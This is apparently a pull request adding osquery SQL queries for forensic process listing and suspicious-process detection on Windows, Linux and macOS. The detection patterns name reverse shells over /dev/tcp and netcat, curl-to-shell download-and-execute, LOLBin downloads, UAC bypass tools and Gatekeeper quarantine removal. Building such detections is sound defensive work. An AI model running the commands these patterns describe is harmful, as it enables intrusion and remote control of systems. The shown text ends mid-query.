@tomsonpl tomsonpl commented Dec 2, 2025

Process Listing and Suspicious Process Detection

Adds comprehensive process listing and suspicious process detection queries for Windows, Linux, and macOS platforms. These queries provide full forensic visibility into running processes with parent chain analysis, code signature validation, file hash enrichment, and targeted threat detection capabilities for incident response and proactive threat hunting.

Core Forensic Artifacts Coverage

#     Artifact               OS       Query File                                   Description
17    Process Listing        Windows  process_listing_windows_elastic       8be8   Full forensic process snapshot with authenticode
17a   Process Listing        Linux    process_listing_linux_elastic         a0c7   Full forensic process snapshot with hashes
17b   Process Listing        macOS    process_listing_macos_elastic         888a   Full forensic process snapshot with signatures
17c   Suspicious Processes   Windows  suspicious_processes_windows_elastic  4537   LOLBin abuse, UAC bypass, unsigned binaries
17d   Suspicious Processes   Linux    suspicious_processes_linux_elastic    4da8   Reverse shells, crypto-miners, container escapes
17e   Suspicious Processes   macOS    suspicious_processes_macos_elastic    2b1b   Gatekeeper bypass, osascript abuse, unsigned

MITRE ATT&CK Coverage

Technique ID   Name                                 Platform(s)
T1059          Command and Scripting Interpreter    Windows, Linux, macOS
T1036          Masquerading                         Windows, Linux
T1055          Process Injection                    Windows
T1105          Ingress Tool Transfer                Linux
T1218          System Binary Proxy Execution        Windows
T1496          Resource Hijacking (Crypto-mining)   Linux, macOS
T1548.002      Bypass User Account Control          Windows
T1553.001      Gatekeeper Bypass                    macOS
T1059.002      AppleScript                          macOS
T1611          Escape to Host (Container)           Linux

Queries by Platform


🪟 Windows - Process Listing (Full Forensic Snapshot)

Description

Comprehensive Windows process listing with parent process context, code signatures, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

  • Complete process tree reconstruction via parent chain enrichment
  • Code signature validation using Windows Authenticode
  • File hash enrichment (MD5/SHA256) for IOC correlation
  • VirusTotal link generation for rapid analyst triage
  • Username resolution for attribution analysis
  • Elevated token detection for privilege assessment

Result

[Screenshot: 2025-12-02 13:35:39]

Query returns all running processes with parent context, code signatures, file hashes, and VirusTotal links for complete forensic analysis.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

process_listing_windows_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • process.thread.count ← threads
  • user.id ← uid
  • user.name ← username
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256
  • process.code_signature.status ← signature_status
  • process.code_signature.subject_name ← signer

SQL Query

-- Windows Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, code signatures, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.handle_count,
    p.on_disk,
    p.elevated_token,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    a.result AS signature_status,
    a.subject_name AS signer
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN authenticode a ON p.path = a.path
WHERE p.path != '';

🐧 Linux - Process Listing (Full Forensic Snapshot)

Description

Comprehensive Linux process listing with parent process context, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

  • Complete process tree reconstruction via parent chain enrichment
  • File hash enrichment (MD5/SHA256) for IOC correlation
  • VirusTotal link generation for rapid analyst triage
  • Username resolution for attribution analysis
  • Effective UID/GID tracking for privilege escalation detection
  • Process state and resource monitoring

Result

[Screenshot: 2025-12-02 13:35:55]

Query returns all running processes with parent context, file hashes, and VirusTotal links for complete forensic analysis.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

process_listing_linux_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • process.thread.count ← threads
  • user.id ← uid
  • user.name ← username
  • user.group.id ← gid
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256

SQL Query

-- Linux Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.nice,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
WHERE p.path != '';

🍎 macOS - Process Listing (Full Forensic Snapshot)

Description

Comprehensive macOS process listing with parent process context, code signatures, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

  • Complete process tree reconstruction via parent chain enrichment
  • Code signature validation using macOS signature table
  • File hash enrichment (MD5/SHA256) for IOC correlation
  • VirusTotal link generation for rapid analyst triage
  • Team identifier and bundle identifier for app attribution
  • Username resolution for attribution analysis

Result

[Screenshot: 2025-12-02 13:34:24]

Query returns all running processes with parent context, code signatures, file hashes, and VirusTotal links for complete forensic analysis.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

process_listing_macos_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • process.thread.count ← threads
  • user.id ← uid
  • user.name ← username
  • user.group.id ← gid
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256
  • process.code_signature.status ← signing_status
  • process.code_signature.subject_name ← authority
  • process.code_signature.team_id ← team_identifier

SQL Query

-- macOS Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, code signatures, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.nice,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    s.signed AS signing_status,
    s.authority,
    s.identifier AS bundle_identifier,
    s.team_identifier
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN signature s ON p.path = s.path
WHERE p.path != '';

🪟 Windows - Suspicious Process Detection

Description

Identifies Windows processes with suspicious characteristics: unsigned executables, unusual paths (temp, public, downloads), LOLBin abuse, UAC bypass tools, and suspicious parent-child relationships. Enriched with code signatures and file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

  • T1059 - Command and Scripting Interpreter
  • T1036 - Masquerading
  • T1055 - Process Injection
  • T1218 - System Binary Proxy Execution
  • T1548.002 - Bypass User Account Control

Detection Focus:

  • Unsigned or untrusted code signatures (non-system paths)
  • Suspicious execution paths: Temp, AppData\Local\Temp, Users\Public, Downloads
  • PowerShell abuse: encoded commands, bypass flags, download cradles
  • Script host execution: mshta.exe, wscript.exe, cscript.exe
  • LOLBin abuse: certutil, bitsadmin, rundll32, regsvr32, msiexec
  • .NET LOLBins: msbuild.exe, installutil.exe, regasm.exe, regsvcs.exe
  • UAC bypass tools: eventvwr.exe, fodhelper.exe, computerdefaults.exe, sdclt.exe
  • Remote execution indicators: WMI provider, WinRM host processes
  • Fileless malware: processes not on disk (on_disk = 0)

Result

[Screenshot: 2025-12-02 13:36:21]

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_windows_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • event.kind = "signal"
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • user.id ← uid
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256
  • process.code_signature.status ← signature_status
  • process.code_signature.subject_name ← signer
  • tags = ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1036", "mitre_t1055", "mitre_t1218", "mitre_t1548_002"]

SQL Query

-- Windows Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1036, T1055, T1218, T1548.002
-- Notes:
--   * osquery's SQL is SQLite: string literals do not process backslash escapes and LIKE has
--     no default ESCAPE character, so Windows paths are written with single backslashes
--     ('C:\Windows\%'). Double them only where the query is embedded in a JSON/YAML string
--     that strips one level of escaping; a literal '\\' in SQL never matches a real path.
--   * LIKE is case-insensitive for ASCII, so '%hidden%' also matches '-WindowStyle Hidden'.
--   * pp.name is NULL when the parent has already exited, and NULL NOT IN (...) is not true;
--     the parent checks test IS NULL explicitly so orphaned processes are not silently dropped.
--   * 'cmd_unusual_parent' and the certutil 'ftp' pattern have no matching WHERE predicate and
--     can only label rows that another predicate already selected.
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    p.elevated_token,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    a.result AS signature_status,
    a.subject_name AS signer,
    CASE
        WHEN a.result IS NOT NULL AND a.result != 'trusted' THEN 'untrusted_signature'
        -- NULL here means the authenticode lookup returned no row at all, not merely "unsigned"
        WHEN a.result IS NULL AND p.path NOT LIKE 'C:\Windows\%' THEN 'unsigned_non_system'
        WHEN p.path LIKE '%\Temp\%' OR p.path LIKE '%\tmp\%' THEN 'suspicious_path_temp'
        WHEN p.path LIKE '%\AppData\Local\Temp\%' THEN 'suspicious_path_appdata_temp'
        WHEN p.path LIKE '%\Users\Public\%' THEN 'suspicious_path_public'
        WHEN p.path LIKE '%\Downloads\%' THEN 'suspicious_path_downloads'
        WHEN p.name IN ('powershell.exe', 'pwsh.exe') AND (p.cmdline LIKE '%encodedcommand%' OR p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-enc %' OR p.cmdline LIKE '%bypass%' OR p.cmdline LIKE '%hidden%') THEN 'powershell_suspicious_args'
        WHEN p.name = 'cmd.exe' AND (p.cmdline LIKE '%/c %' OR p.cmdline LIKE '%/k %') AND (pp.name IS NULL OR pp.name NOT IN ('explorer.exe', 'cmd.exe', 'powershell.exe', 'pwsh.exe')) THEN 'cmd_unusual_parent'
        WHEN p.name IN ('mshta.exe', 'wscript.exe', 'cscript.exe') THEN 'script_host_execution'
        WHEN p.name IN ('certutil.exe', 'bitsadmin.exe') AND (p.cmdline LIKE '%http%' OR p.cmdline LIKE '%ftp%' OR p.cmdline LIKE '%decode%' OR p.cmdline LIKE '%urlcache%') THEN 'lolbin_download'
        WHEN p.name = 'rundll32.exe' AND (p.cmdline LIKE '%javascript%' OR p.cmdline LIKE '%vbscript%') THEN 'rundll32_script'
        WHEN p.name IN ('regsvr32.exe', 'msiexec.exe') AND p.cmdline LIKE '%http%' THEN 'lolbin_remote_payload'
        WHEN p.name IN ('msbuild.exe', 'installutil.exe', 'regasm.exe', 'regsvcs.exe') THEN 'dotnet_lolbin'
        WHEN p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe') AND (pp.name IS NULL OR pp.name NOT IN ('explorer.exe', 'svchost.exe')) THEN 'uac_bypass_tool'
        WHEN p.name = 'wmic.exe' AND (p.cmdline LIKE '%process%call%create%' OR p.cmdline LIKE '%/node:%') THEN 'wmic_execution'
        WHEN pp.name = 'wmiprvse.exe' OR pp.name = 'wsmprovhost.exe' THEN 'remote_execution_parent'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN authenticode a ON p.path = a.path
WHERE p.path != ''
AND (
    -- Untrusted signatures (explicit non-trusted result)
    (a.result IS NOT NULL AND a.result != 'trusted')
    -- Unsigned non-system binaries
    OR (a.result IS NULL AND p.path NOT LIKE 'C:\Windows\%' AND p.path NOT LIKE 'C:\Program Files\%' AND p.path NOT LIKE 'C:\Program Files (x86)\%')
    -- Suspicious execution paths (narrowed to reduce noise)
    OR p.path LIKE '%\Temp\%'
    OR p.path LIKE '%\tmp\%'
    OR p.path LIKE '%\AppData\Local\Temp\%'
    OR p.path LIKE '%\Users\Public\%'
    OR p.path LIKE '%\Downloads\%'
    -- PowerShell abuse patterns
    OR (p.name IN ('powershell.exe', 'pwsh.exe') AND (
        p.cmdline LIKE '%encodedcommand%'
        OR p.cmdline LIKE '%-e %'
        OR p.cmdline LIKE '%-enc %'
        OR p.cmdline LIKE '%bypass%'
        OR p.cmdline LIKE '%hidden%'
        OR p.cmdline LIKE '%downloadstring%'
        OR p.cmdline LIKE '%iex%'
        OR p.cmdline LIKE '%invoke-expression%'
        OR p.cmdline LIKE '%webclient%'
    ))
    -- Script host execution
    OR p.name IN ('mshta.exe', 'wscript.exe', 'cscript.exe')
    -- LOLBin download/decode
    OR (p.name IN ('certutil.exe', 'bitsadmin.exe') AND (p.cmdline LIKE '%http%' OR p.cmdline LIKE '%decode%' OR p.cmdline LIKE '%urlcache%'))
    -- Rundll32 script execution
    OR (p.name = 'rundll32.exe' AND (p.cmdline LIKE '%javascript%' OR p.cmdline LIKE '%vbscript%'))
    -- Remote payload LOLBins
    OR (p.name IN ('regsvr32.exe', 'msiexec.exe') AND p.cmdline LIKE '%http%')
    -- .NET LOLBins (AppLocker bypass)
    OR p.name IN ('msbuild.exe', 'installutil.exe', 'regasm.exe', 'regsvcs.exe')
    -- UAC bypass tools with unusual (or already exited) parents
    OR (p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe') AND (pp.name IS NULL OR pp.name NOT IN ('explorer.exe', 'svchost.exe')))
    -- WMIC lateral movement / execution
    OR (p.name = 'wmic.exe' AND (p.cmdline LIKE '%process%call%create%' OR p.cmdline LIKE '%/node:%'))
    -- Remote execution indicators
    OR pp.name IN ('wmiprvse.exe', 'wsmprovhost.exe')
    -- Process running from memory (not on disk)
    OR p.on_disk = 0
);

🐧 Linux - Suspicious Process Detection

Description

Identifies Linux processes with suspicious characteristics: execution from /tmp, /dev/shm, or /var/tmp, reverse shell patterns, suspicious interpreters, crypto-miners, container escapes, and unusual binary locations. Enriched with file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

  • T1059 - Command and Scripting Interpreter
  • T1036 - Masquerading
  • T1105 - Ingress Tool Transfer
  • T1496 - Resource Hijacking (Crypto-mining)
  • T1611 - Escape to Host (Container Escape)

Detection Focus:

  • Suspicious execution paths: /tmp, /var/tmp, /dev/shm, hidden directories
  • Reverse shell patterns: /dev/tcp, /dev/udp, netcat -e/-c, socat exec
  • Interactive shell spawning: bash -i, sh -i
  • Download-and-execute: curl|sh, wget|bash
  • Base64 decode obfuscation
  • Hidden process names (starting with .)
  • Crypto-miner indicators: stratum, xmr, monero, nicehash, pool, cryptonight, randomx
  • Container escape patterns: nsenter, --target 1
  • Root processes from unusual locations
  • Fileless malware: processes not on disk

Result

[Screenshot: 2025-12-02 13:36:42]

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_linux_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • event.kind = "signal"
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • user.id ← uid
  • user.group.id ← gid
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256
  • tags = ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1036", "mitre_t1105", "mitre_t1496", "mitre_t1611"]

SQL Query

-- Linux Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1036, T1105, T1496, T1611
-- Notes:
--   * LIKE is case-insensitive and substring-based: '%sh -i%' also matches 'ssh -i <keyfile>',
--     '%xmr%' matches any argument containing those letters, and '%nsenter%' fires for container
--     runtimes and node agents that call nsenter routinely. Tune against a baseline before alerting.
--   * p.name on Linux is the kernel comm value (at most 15 characters), so a versioned interpreter
--     such as 'python3.12' misses the IN (...) list below; match on p.path if that matters.
--   * detection_reason is the first CASE branch that matches, not the most severe one: a miner
--     running from /tmp is labelled 'suspicious_path_tmp'.
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    CASE
        WHEN p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%' THEN 'suspicious_path_tmp'
        WHEN p.path LIKE '/dev/shm/%' THEN 'suspicious_path_devshm'
        WHEN p.path LIKE '/home/%/.%' THEN 'hidden_in_home'
        WHEN p.cmdline LIKE '%/dev/tcp/%' OR p.cmdline LIKE '%/dev/udp/%' THEN 'reverse_shell_devtcp'
        WHEN p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %') THEN 'netcat_shell'
        WHEN p.cmdline LIKE '%ncat %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %') THEN 'ncat_shell'
        WHEN p.cmdline LIKE '%bash -i%' OR p.cmdline LIKE '%sh -i%' THEN 'interactive_shell'
        WHEN p.name IN ('python', 'python3', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%' THEN 'script_socket'
        WHEN p.cmdline LIKE '%curl%|%sh%' OR p.cmdline LIKE '%wget%|%sh%' OR p.cmdline LIKE '%curl%|%bash%' OR p.cmdline LIKE '%wget%|%bash%' THEN 'download_and_execute'
        WHEN p.cmdline LIKE '%base64 -d%' OR p.cmdline LIKE '%base64 --decode%' THEN 'base64_decode'
        WHEN p.name LIKE '.%' THEN 'hidden_process_name'
        WHEN p.cmdline LIKE '%stratum%' OR p.cmdline LIKE '%xmr%' OR p.cmdline LIKE '%monero%' OR p.cmdline LIKE '%nicehash%' OR p.cmdline LIKE '%pool.%' THEN 'crypto_miner'
        WHEN p.cmdline LIKE '%nsenter%' OR p.cmdline LIKE '%--target 1%' THEN 'container_escape'
        -- Exclusion list kept in step with the WHERE predicate below
        WHEN p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/opt/%' AND p.path NOT LIKE '/lib/%' THEN 'root_unusual_path'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
WHERE p.path != ''
AND (
    -- Suspicious execution paths
    p.path LIKE '/tmp/%'
    OR p.path LIKE '/var/tmp/%'
    OR p.path LIKE '/dev/shm/%'
    OR p.path LIKE '/home/%/.%'
    -- Reverse shell patterns
    OR p.cmdline LIKE '%/dev/tcp/%'
    OR p.cmdline LIKE '%/dev/udp/%'
    -- Netcat reverse shells
    OR (p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %'))
    OR (p.cmdline LIKE '%ncat %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %'))
    OR (p.cmdline LIKE '%socat %' AND p.cmdline LIKE '%exec%')
    -- Interactive shell spawning (note: '%sh -i%' also matches 'ssh -i')
    OR p.cmdline LIKE '%bash -i%'
    OR p.cmdline LIKE '%sh -i%'
    -- Script interpreters with network activity
    OR (p.name IN ('python', 'python3', 'python2', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%')
    -- Download and execute patterns
    OR p.cmdline LIKE '%curl%|%sh%'
    OR p.cmdline LIKE '%wget%|%sh%'
    OR p.cmdline LIKE '%curl%|%bash%'
    OR p.cmdline LIKE '%wget%|%bash%'
    -- Base64 decode (often used in obfuscation)
    OR (p.cmdline LIKE '%base64%' AND (p.cmdline LIKE '%-d%' OR p.cmdline LIKE '%--decode%'))
    -- Hidden process names
    OR p.name LIKE '.%'
    -- Running from memory
    OR p.on_disk = 0
    -- Crypto-miner indicators (T1496 Resource Hijacking)
    OR p.cmdline LIKE '%stratum%'
    OR p.cmdline LIKE '%xmr%'
    OR p.cmdline LIKE '%monero%'
    OR p.cmdline LIKE '%nicehash%'
    OR p.cmdline LIKE '%pool.%mining%'
    OR p.cmdline LIKE '%cryptonight%'
    OR p.cmdline LIKE '%randomx%'
    -- Container escape indicators (T1611); expect benign hits from container runtimes
    OR p.cmdline LIKE '%nsenter%'
    OR (p.cmdline LIKE '%--target%' AND p.cmdline LIKE '%--mount%')
    OR (p.cmdline LIKE '%--target 1%')
    -- Root processes from unusual locations
    OR (p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/opt/%' AND p.path NOT LIKE '/lib/%')
);

🍎 macOS - Suspicious Process Detection

Description

Identifies macOS processes with suspicious characteristics: unsigned executables, execution from /tmp or hidden directories, osascript abuse, quarantine bypass, crypto-miners, and suspicious interpreters. Enriched with code signatures and file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

  • T1059 - Command and Scripting Interpreter
  • T1553.001 - Gatekeeper Bypass
  • T1059.002 - AppleScript
  • T1496 - Resource Hijacking (Crypto-mining)

Detection Focus:

  • Unsigned or ad-hoc signed binaries
  • Suspicious execution paths: /tmp, /var/tmp, /private/tmp, /Users/Shared, hidden paths
  • osascript abuse: JavaScript execution, do shell script, NSAppleScript
  • Download-and-execute patterns: curl|sh, wget|bash
  • Quarantine attribute removal (Gatekeeper bypass): xattr -d com.apple.quarantine
  • Script interpreters with network activity
  • Base64 decode obfuscation
  • Hidden process names
  • Crypto-miner indicators
  • Root processes from unusual locations
  • Fileless malware: processes not on disk

Result

[Screenshot: 2025-12-02 13:34:57]

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_macos_elastic

ECS Field Mappings (ECS field ← result column)

  • event.category = ["process"]
  • event.type = ["info"]
  • event.kind = "signal"
  • process.pid ← pid
  • process.name ← name
  • process.executable ← path
  • process.command_line ← cmdline
  • process.working_directory ← cwd
  • process.parent.pid ← ppid
  • process.parent.name ← parent_name
  • process.parent.executable ← parent_path
  • process.parent.command_line ← parent_cmdline
  • process.start ← start_time
  • user.id ← uid
  • user.group.id ← gid
  • process.hash.md5 ← md5
  • process.hash.sha256 ← sha256
  • process.code_signature.status ← signing_status
  • process.code_signature.subject_name ← authority
  • process.code_signature.team_id ← team_identifier
  • tags = ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1553_001", "mitre_t1059_002", "mitre_t1496"]

SQL Query

-- macOS Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1553.001, T1059.002, T1496
-- Notes:
--   * signature.signed is 1 for ad-hoc signed binaries as well (authority is then empty), so the
--     signed = 0 / NULL test catches unsigned files only. Ad-hoc is deliberately not flagged here:
--     on Apple silicon the linker ad-hoc signs every locally built binary, which would drown the query.
--   * /tmp is a symlink to /private/tmp on macOS and osquery reports the resolved executable path,
--     so in practice the /private/tmp pattern is the one that fires.
--   * LIKE is case-insensitive, so '%-D%' (BSD base64 decode) also matches '-d' and any '-Dfoo' flag.
--   * '%/.%' matches any hidden path component, including ~/.nvm, ~/.cargo and similar developer tooling.
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    s.signed AS signing_status,
    s.authority,
    s.identifier AS bundle_identifier,
    s.team_identifier,
    CASE
        WHEN s.signed = 0 OR s.signed IS NULL THEN 'unsigned_binary'
        WHEN p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%' THEN 'suspicious_path_tmp'
        WHEN p.path LIKE '/private/tmp/%' THEN 'suspicious_path_private_tmp'
        WHEN p.path LIKE '/Users/Shared/%' THEN 'suspicious_path_shared'
        WHEN p.path LIKE '%/.%' THEN 'hidden_path'
        -- Unreachable after the first branch (signed = 0 is already labelled 'unsigned_binary'); kept for readability
        WHEN p.path LIKE '/Users/%/Library/%' AND s.signed = 0 THEN 'unsigned_in_library'
        WHEN p.name = 'osascript' AND (p.cmdline LIKE '%JavaScript%' OR p.cmdline LIKE '%do shell script%') THEN 'osascript_abuse'
        WHEN p.name = 'curl' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%') THEN 'curl_pipe_shell'
        WHEN p.cmdline LIKE '%xattr -d com.apple.quarantine%' OR p.cmdline LIKE '%xattr -c%' THEN 'quarantine_removal'
        WHEN p.name IN ('python', 'python3', 'perl', 'ruby') AND p.cmdline LIKE '%socket%' THEN 'script_socket'
        WHEN p.cmdline LIKE '%base64%' AND p.cmdline LIKE '%-D%' THEN 'base64_decode'
        WHEN p.name LIKE '.%' THEN 'hidden_process_name'
        WHEN p.cmdline LIKE '%stratum%' OR p.cmdline LIKE '%xmr%' OR p.cmdline LIKE '%monero%' OR p.cmdline LIKE '%nicehash%' OR p.cmdline LIKE '%pool.%' THEN 'crypto_miner'
        -- Exclusion list kept in step with the WHERE predicate below
        WHEN p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/System/%' AND p.path NOT LIKE '/Applications/%' AND p.path NOT LIKE '/Library/%' THEN 'root_unusual_path'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN signature s ON p.path = s.path
WHERE p.path != ''
AND (
    -- Unsigned binaries (no signature, or no signature row); ad-hoc signed files report signed = 1
    s.signed = 0 OR s.signed IS NULL
    -- Suspicious execution paths
    OR p.path LIKE '/tmp/%'
    OR p.path LIKE '/var/tmp/%'
    OR p.path LIKE '/private/tmp/%'
    OR p.path LIKE '/Users/Shared/%'
    OR p.path LIKE '%/.%'
    -- osascript abuse (AppleScript for command execution)
    OR (p.name = 'osascript' AND (
        p.cmdline LIKE '%JavaScript%'
        OR p.cmdline LIKE '%do shell script%'
        OR p.cmdline LIKE '%NSAppleScript%'
    ))
    -- Download and execute patterns
    OR (p.name = 'curl' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%'))
    OR (p.name = 'wget' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%'))
    -- Quarantine attribute removal (Gatekeeper bypass)
    OR p.cmdline LIKE '%xattr -d com.apple.quarantine%'
    OR p.cmdline LIKE '%xattr -c%'
    OR p.cmdline LIKE '%xattr -r -d%'
    -- Script interpreters with network activity
    OR (p.name IN ('python', 'python3', 'python2', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%')
    -- Base64 decode (obfuscation); case-insensitive, so -d matches too
    OR (p.cmdline LIKE '%base64%' AND p.cmdline LIKE '%-D%')
